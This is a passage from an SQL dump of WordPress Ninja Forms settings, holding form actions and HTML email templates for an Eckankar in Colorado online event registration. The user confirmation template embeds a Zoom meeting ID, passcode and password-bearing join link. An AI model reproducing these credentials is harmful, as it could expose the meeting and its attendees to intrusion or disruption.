Submission'),(4990,168,'message','{all_fields_table}','message','{all_fields_table}'),(4991,168,'order','2','order','2'),(4992,168,'payment_gateways','','payment_gateways',''),(4993,168,'payment_total','0','payment_total','0'),(4994,168,'tag','','tag',''),(4995,168,'email_subject','New Event Registration from {field:firstname} {field:lastname}','email_subject','New Event Registration from {field:firstname} {field:lastname}'),(4996,168,'email_message','<p>Registration details are below:</p><p>{all_fields_table}<br></p>','email_message','<p>Registration details are below:</p><p>{all_fields_table}<br></p>'),(4997,168,'from_name','','from_name',''),(4998,168,'from_address','','from_address',''),(4999,168,'reply_to','{field:email}','reply_to','{field:email}'),(5000,168,'email_format','html','email_format','html'),(5001,168,'cc','','cc',''),(5002,168,'bcc','','bcc',''),(5003,168,'attach_csv','','attach_csv',''),(5004,168,'parent_id','42','parent_id','42'),(5005,168,'email_message_plain','','email_message_plain',''),(5006,169,'title','','title',''),(5007,169,'key','','key',''),(5008,169,'type','successmessage','type','successmessage'),(5009,169,'active','1','active','1'),(5010,169,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5011,169,'label','Success Message','label','Success Message'),(5012,169,'objectType','Action','objectType','Action'),(5013,169,'objectDomain','actions','objectDomain','actions'),(5014,169,'editActive','','editActive',''),(5015,169,'message','Your form has been successfully submitted.','message','Your form has been successfully submitted.'),(5016,169,'order','1','order','1'),(5017,169,'payment_gateways','','payment_gateways',''),(5018,169,'payment_total','0','payment_total','0'),(5019,169,'tag','','tag',''),(5020,169,'to','{wp:admin_email}','to','{wp:admin_email}'),(5021,169,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(5022,169,'email_message','{fields_table}','email_message','{fields_table}'),(5023,169,'from_name','','from_name',''),(5024,169,'from_address','','from_address',''),(5025,169,'reply_to','','reply_to',''),(5026,169,'email_format','html','email_format','html'),(5027,169,'cc','','cc',''),(5028,169,'bcc','','bcc',''),(5029,169,'attach_csv','','attach_csv',''),(5030,169,'redirect_url','','redirect_url',''),(5031,169,'success_msg','<p>Thank you for registering for our event.</p><p>You Will receive an email with the Zoom Login info<br></p>','success_msg','<p>Thank you for registering for our event.</p><p>You Will receive an email with the Zoom Login info<br></p>'),(5032,169,'parent_id','42','parent_id','42'),(5033,169,'email_message_plain','','email_message_plain',''),(5034,169,'submitter_email','','submitter_email',''),(5035,169,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(5036,169,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(5037,169,'set_subs_to_expire','0','set_subs_to_expire','0'),(5038,169,'subs_expire_time','90','subs_expire_time','90'),(5039,169,'drawerDisabled','','drawerDisabled',''),(5163,93,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(5164,33,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(5181,19,'drawerDisabled','','drawerDisabled',''),(5182,7,'drawerDisabled','','drawerDisabled',''),(5183,23,'drawerDisabled','','drawerDisabled',''),(5184,35,'drawerDisabled','','drawerDisabled',''),(5185,39,'drawerDisabled','','drawerDisabled',''),(5186,137,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(5187,43,'drawerDisabled','','drawerDisabled',''),(5188,47,'drawerDisabled','','drawerDisabled',''),(5189,59,'drawerDisabled','','drawerDisabled',''),(5190,63,'drawerDisabled','','drawerDisabled',''),(5191,65,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(5192,71,'drawerDisabled','','drawerDisabled',''),(5193,75,'drawerDisabled','','drawerDisabled',''),(5194,79,'drawerDisabled','','drawerDisabled',''),(5195,87,'drawerDisabled','','drawerDisabled',''),(5196,91,'drawerDisabled','','drawerDisabled',''),(5197,95,'drawerDisabled','','drawerDisabled',''),(5198,97,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(5199,99,'drawerDisabled','','drawerDisabled',''),(5200,13,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(5201,175,'title','','title',''),(5202,175,'key','','key',''),(5203,175,'type','save','type','save'),(5204,175,'active','1','active','1'),(5205,175,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5206,175,'label','Store Submission','label','Store Submission'),(5207,175,'objectType','Action','objectType','Action'),(5208,175,'objectDomain','actions','objectDomain','actions'),(5209,175,'editActive','','editActive',''),(5210,175,'order','3','order','3'),(5211,175,'payment_gateways','','payment_gateways',''),(5212,175,'payment_total','0','payment_total','0'),(5213,175,'tag','','tag',''),(5214,175,'to','{wp:admin_email}','to','{wp:admin_email}'),(5215,175,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(5216,175,'email_message','{fields_table}','email_message','{fields_table}'),(5217,175,'from_name','','from_name',''),(5218,175,'from_address','','from_address',''),(5219,175,'reply_to','','reply_to',''),(5220,175,'email_format','html','email_format','html'),(5221,175,'cc','','cc',''),(5222,175,'bcc','','bcc',''),(5223,175,'attach_csv','','attach_csv',''),(5224,175,'redirect_url','','redirect_url',''),(5225,175,'parent_id','44','parent_id','44'),(5226,175,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(5227,175,'email_message_plain','','email_message_plain',''),(5228,175,'submitter_email','','submitter_email',''),(5229,175,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(5230,175,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(5231,175,'set_subs_to_expire','0','set_subs_to_expire','0'),(5232,175,'subs_expire_time','90','subs_expire_time','90'),(5233,175,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(5234,175,'drawerDisabled','','drawerDisabled',''),(5235,176,'title','','title',''),(5236,176,'key','','key',''),(5237,176,'type','email','type','email'),(5238,176,'active','1','active','1'),(5239,176,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5240,176,'label','User Email Confirmation','label','User Email Confirmation'),(5241,176,'objectType','Action','objectType','Action'),(5242,176,'objectDomain','actions','objectDomain','actions'),(5243,176,'editActive','','editActive',''),(5244,176,'to','{field:email}','to','{field:email}'),(5245,176,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(5246,176,'message','{all_fields_table}','message','{all_fields_table}'),(5247,176,'order','2','order','2'),(5248,176,'payment_gateways','','payment_gateways',''),(5249,176,'payment_total','0','payment_total','0'),(5250,176,'tag','','tag',''),(5251,176,'email_subject','Thank you for registering for our event','email_subject','Thank you for registering for our event'),(5252,176,'email_message','<meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\">    <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">    <meta name=\"x-apple-disable-message-reformatting\">    <title>ELSS REGISTRATION - USER CONFIRMATION</title>    <!--[if mso]>  <style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style>  <noscript>    <xml>      <o:OfficeDocumentSettings>        <o:PixelsPerInch>96</o:PixelsPerInch>      </o:OfficeDocumentSettings>    </xml>  </noscript>  <![endif]-->    <style>    table, td, div, h1, p {      font-family: Arial, sans-serif;    }    @media screen and (max-width: 530px) {      .unsub {        display: block;        padding: 8px;        margin-top: 14px;        border-radius: 6px;        background-color: #555555;        text-decoration: none !important;        font-weight: bold;      }      .col-lge {        max-width: 100% !important;      }    }    @media screen and (min-width: 531px) {      .col-sml {        max-width: 27% !important;      }      .col-lge {        max-width: 73% !important;      }    }  </style>        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0; border:solid 1px #cccccc;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <br>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">\'Experience                                The Sound of Soul\'<br>                                Event Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding: 30px; padding-top:10px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Hello                                  {field:firstname},<span style=\"color: #333333; font-size: 20px;\"></span><br>                                </span></p>                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Thank                                  You For Registering!                                  <br>                                </span></p>                              <p class=\"\" style=\"font-size: 18px;\">                                <b>You Are Signed Up                                  For The Following                                  Zoom Event:<br>                                  <span style=\"color: #23507d; font-size: 17px;\">\'Experience                                    The Sound of Soul\'                                    - Online<br></span><span style=\"color: #23507d;font-size: 17px;\">10:30                                    AM to 11:30 AM.</span></b></p>                              <p class=\"\" style=\"font-size: 19px; color: #f28a27;\"><strong>Zoom                                  Login Information:</strong></p>                              <strong>Meeting ID:</strong>                              891 2510 3432<br>                              <strong>Passcode: </strong>162109<br>                              <br>                              <strong>Join Zoom Meeting                                from a web browser:</strong><br>                              <a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a><br>                              <br>                              After you click the link,                              you will be prompted to                              either download the app                              to enter the meeting or                              enter through your                              browser. Please note that                              Zoom works best if you                              download the app. It is                              more stable and has more                              functions. Select use                              computer audio for sound.<br>                              <br>                              Please join the meeting 5                              - 10 minutes ahead of                              time to help us start on                              time. We look forward to                              seeing you at this online                              event.<br>                              <br>                              See you there!</td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">                              <p style=\"margin: 0;\">You                                are receiving this                                email because you have                                submitted a request                                through the <a href=\"https://eckankar-colorado.org/\">Eckankar                                  in Colorado website.</a></p>                              <p style=\"text-align: center; font-family: Arial, Helvetica, sans-serif; font-size: 15px;\">If                                you have any questions                                regarding the origin of                                this email, please feel                                free to get in touch,                                we\'re always happy to                                help out.</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\">                              <p style=\"margin: 0 0 8px 0;\"><a style=\"text-decoration: none;\" href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\"><img style=\"display: inline-block; color: #cccccc;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\"></a>&nbsp;</p>                              <p style=\"margin: 0; font-size: 14px; line-height: 20px;\">©                                Eckankar In Colorado -                                2021<br>                                <a class=\"unsub\" style=\"color: #cccccc; text-decoration: underline;\" href=\"mailto:webmaster@eckankar-colorado.org\">Contact                                  Us</a></p>                            </td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]--></td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>','email_message','<meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\">    <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">    <meta name=\"x-apple-disable-message-reformatting\">    <title>ELSS REGISTRATION - USER CONFIRMATION</title>    <!--[if mso]>  <style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style>  <noscript>    <xml>      <o:OfficeDocumentSettings>        <o:PixelsPerInch>96</o:PixelsPerInch>      </o:OfficeDocumentSettings>    </xml>  </noscript>  <![endif]-->    <style>    table, td, div, h1, p {      font-family: Arial, sans-serif;    }    @media screen and (max-width: 530px) {      .unsub {        display: block;        padding: 8px;        margin-top: 14px;        border-radius: 6px;        background-color: #555555;        text-decoration: none !important;        font-weight: bold;      }      .col-lge {        max-width: 100% !important;      }    }    @media screen and (min-width: 531px) {      .col-sml {        max-width: 27% !important;      }      .col-lge {        max-width: 73% !important;      }    }  </style>        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0; border:solid 1px #cccccc;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <br>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">\'Experience                                The Sound of Soul\'<br>                                Event Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding: 30px; padding-top:10px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Hello                                  {field:firstname},<span style=\"color: #333333; font-size: 20px;\"></span><br>                                </span></p>                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Thank                                  You For Registering!                                  <br>                                </span></p>                              <p class=\"\" style=\"font-size: 18px;\">                                <b>You Are Signed Up                                  For The Following                                  Zoom Event:<br>                                  <span style=\"color: #23507d; font-size: 17px;\">\'Experience                                    The Sound of Soul\'                                    - Online<br></span><span style=\"color: #23507d;font-size: 17px;\">10:30                                    AM to 11:30 AM.</span></b></p>                              <p class=\"\" style=\"font-size: 19px; color: #f28a27;\"><strong>Zoom                                  Login Information:</strong></p>                              <strong>Meeting ID:</strong>                              891 2510 3432<br>                              <strong>Passcode: </strong>162109<br>                              <br>                              <strong>Join Zoom Meeting                                from a web browser:</strong><br>                              <a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a><br>                              <br>                              After you click the link,                              you will be prompted to                              either download the app                              to enter the meeting or                              enter through your                              browser. Please note that                              Zoom works best if you                              download the app. It is                              more stable and has more                              functions. Select use                              computer audio for sound.<br>                              <br>                              Please join the meeting 5                              - 10 minutes ahead of                              time to help us start on                              time. We look forward to                              seeing you at this online                              event.<br>                              <br>                              See you there!</td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">                              <p style=\"margin: 0;\">You                                are receiving this                                email because you have                                submitted a request                                through the <a href=\"https://eckankar-colorado.org/\">Eckankar                                  in Colorado website.</a></p>                              <p style=\"text-align: center; font-family: Arial, Helvetica, sans-serif; font-size: 15px;\">If                                you have any questions                                regarding the origin of                                this email, please feel                                free to get in touch,                                we\'re always happy to                                help out.</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\">                              <p style=\"margin: 0 0 8px 0;\"><a style=\"text-decoration: none;\" href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\"><img style=\"display: inline-block; color: #cccccc;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\"></a>&nbsp;</p>                              <p style=\"margin: 0; font-size: 14px; line-height: 20px;\">©                                Eckankar In Colorado -                                2021<br>                                <a class=\"unsub\" style=\"color: #cccccc; text-decoration: underline;\" href=\"mailto:webmaster@eckankar-colorado.org\">Contact                                  Us</a></p>                            </td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]--></td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>'),(5253,176,'from_name','','from_name',''),(5254,176,'from_address','{system:admin_email}','from_address','{system:admin_email}'),(5255,176,'reply_to','','reply_to',''),(5256,176,'email_format','html','email_format','html'),(5257,176,'cc','','cc',''),(5258,176,'bcc','','bcc',''),(5259,176,'attach_csv','','attach_csv',''),(5260,176,'parent_id','44','parent_id','44'),(5261,176,'email_message_plain','','email_message_plain',''),(5262,176,'drawerDisabled','','drawerDisabled',''),(5263,177,'title','','title',''),(5264,177,'key','','key',''),(5265,177,'type','email','type','email'),(5266,177,'active','1','active','1'),(5267,177,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5268,177,'label','Admin Email Notification','label','Admin Email Notification'),(5269,177,'objectType','Action','objectType','Action'),(5270,177,'objectDomain','actions','objectDomain','actions'),(5271,177,'editActive','','editActive',''),(5272,177,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(5273,177,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(5274,177,'message','{all_fields_table}','message','{all_fields_table}'),(5275,177,'order','2','order','2'),(5276,177,'payment_gateways','','payment_gateways',''),(5277,177,'payment_total','0','payment_total','0'),(5278,177,'tag','','tag',''),(5279,177,'email_subject','New Event Registration from {field:firstname} {field:lastname}','email_subject','New Event Registration from {field:firstname} {field:lastname}'),(5280,177,'email_message','      <meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1252\">    <title>ADMIN NOTIFICATION - FINAL</title>        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <span style=\"padding:0px 0px 0px 0px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">New SOSE Web Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding-left: 30px; padding-right 30px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #333333; font-size: 20px;\"><b><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                        </span></span></span></b></span></p>                              <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Admin                                  Notification<br>                                </b></p>                              <b>                                <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A                                  new SOSE registration                                  has been received. <span style=\"color: #333333; font-size: 20px;\"></span></p>                              </b>                              <p></p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\"><b>Registrant                                Information:</b><br>                              <br>                              <strong>Name:</strong>&nbsp;                              <span style=\"display: inline-block;\">{field:firstname}                                {field:lastname}<br>                              </span>                              <p style=\"font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\">                                <strong>Email:</strong>&nbsp;                                {field:email}</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 16px; background-color: #747474; color: #cccccc;\">Regards,<br>                              Your ECK in Colorado                              Website</td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]-->                    </td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>  ','email_message','      <meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1252\">    <title>ADMIN NOTIFICATION - FINAL</title>        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <span style=\"padding:0px 0px 0px 0px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">New SOSE Web Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding-left: 30px; padding-right 30px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #333333; font-size: 20px;\"><b><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                        </span></span></span></b></span></p>                              <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Admin                                  Notification<br>                                </b></p>                              <b>                                <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A                                  new SOSE registration                                  has been received. <span style=\"color: #333333; font-size: 20px;\"></span></p>                              </b>                              <p></p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\"><b>Registrant                                Information:</b><br>                              <br>                              <strong>Name:</strong>&nbsp;                              <span style=\"display: inline-block;\">{field:firstname}                                {field:lastname}<br>                              </span>                              <p style=\"font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\">                                <strong>Email:</strong>&nbsp;                                {field:email}</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 16px; background-color: #747474; color: #cccccc;\">Regards,<br>                              Your ECK in Colorado                              Website</td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]-->                    </td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>  '),(5281,177,'from_name','','from_name',''),(5282,177,'from_address','','from_address',''),(5283,177,'reply_to','{field:email}','reply_to','{field:email}'),(5284,177,'email_format','html','email_format','html'),(5285,177,'cc','','cc',''),(5286,177,'bcc','','bcc',''),(5287,177,'attach_csv','','attach_csv',''),(5288,177,'parent_id','44','parent_id','44'),(5289,177,'email_message_plain','','email_message_plain',''),(5290,178,'title','','title',''),(5291,178,'key','','key',''),(5292,178,'type','successmessage','type','successmessage'),(5293,178,'active','1','active','1'),(5294,178,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5295,178,'label','Success Message','label','Success Message'),(5296,178,'objectType','Action','objectType','Action'),(5297,178,'objectDomain','actions','objectDomain','actions'),(5298,178,'editActive','','editActive',''),(5299,178,'message','Your form has been successfully submitted.','message','Your form has been successfully submitted.'),(5300,178,'order','1','order','1'),(5301,178,'payment_gateways','','payment_gateways',''),(5302,178,'payment_total','0','payment_total','0'),(5303,178,'tag','','tag',''),(5304,178,'to','{wp:admin_email}','to','{wp:admin_email}'),(5305,178,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(5306,178,'email_message','{fields_table}','email_message','{fields_table}'),(5307,178,'from_name','','from_name',''),(5308,178,'from_address','','from_address',''),(5309,178,'reply_to','','reply_to',''),(5310,178,'email_format','html','email_format','html'),(5311,178,'cc','','cc',''),(5312,178,'bcc','','bcc',''),(5313,178,'attach_csv','','attach_csv',''),(5314,178,'redirect_url','','redirect_url',''),(5315,178,'success_msg','<p style=\" font-size:20pt;color:#1d5791;\" align=\"center\"><b>Thank you for registering for our event!</b></p><p style=\" font-size:16pt;color:#333333\" align=\"center\">You will receive an email with Zoom Login information.</p>','success_msg','<p style=\" font-size:20pt;color:#1d5791;\" align=\"center\"><b>Thank you for registering for our event!</b></p><p style=\" font-size:16pt;color:#333333\" align=\"center\">You will receive an email with Zoom Login information.</p>'),(5316,178,'parent_id','44','parent_id','44'),(5317,178,'email_message_plain','','email_message_plain',''),(5318,178,'submitter_email','','submitter_email',''),(5319,178,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(5320,178,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(5321,178,'set_subs_to_expire','0','set_subs_to_expire','0'),(5322,178,'subs_expire_time','90','subs_expire_time','90'),(5323,178,'drawerDisabled','','drawerDisabled',''),(5324,177,'drawerDisabled','','drawerDisabled',''),(5325,81,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(5450,183,'key','','key',''),(5451,183,'title','','title',''),(5452,183,'type','save','type','save'),(5453,183,'active','1','active','1'),(5454,183,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(5455,183,'label','Store Submission','label','Store Submission'),(5456,183,'objectType','Action','objectType','Action'),(5457,183,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(5458,183,'email_message_plain','','email_message_plain',''),(5459,183,'submitter_email','','submitter_email',''),(5460,183,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(5461,183,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(5462,183,'set_subs_to_expire','0','set_subs_to_expire','0'),(5463,183,'subs_expire_time','90','subs_expire_time','90'),(5464,183,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(5465,183,'drawerDisabled','','drawerDisabled',''),(5466,183,'objectDomain','actions','objectDomain','actions'),(5467,183,'editActive','','editActive',''),(5468,183,'order','3','order','3'),(5469,183,'payment_gateways','','payment_gateways',''),(5470,183,'payment_total','0','payment_total','0'),(5471,183,'tag','','tag',''),(5472,183,'to','{wp:admin_email}','to','{wp:admin_email}'),(5473,183,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(5474,183,'email_message','{fields_table}','email_message','{fields_table}'),(5475,183,'from_name','','from_name',''),(5476,183,'from_address','','from_address',''),(5477,183,'reply_to','','reply_to',''),(5478,183,'email_format','html','email_format','html'),(5479,183,'cc','','cc',''),(5480,183,'bcc','','bcc',''),(5481,183,'attach_csv','','attach_csv',''),(5482,183,'redirect_url','','redirect_url',''),(5483,183,'parent_id','44','parent_id','44'),(5484,184,'email_message','<meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\">    <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">    <meta name=\"x-apple-disable-message-reformatting\">    <title>ELSS REGISTRATION - USER CONFIRMATION</title>    <!--[if mso]>  <style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style>  <noscript>    <xml>      <o:OfficeDocumentSettings>        <o:PixelsPerInch>96</o:PixelsPerInch>      </o:OfficeDocumentSettings>    </xml>  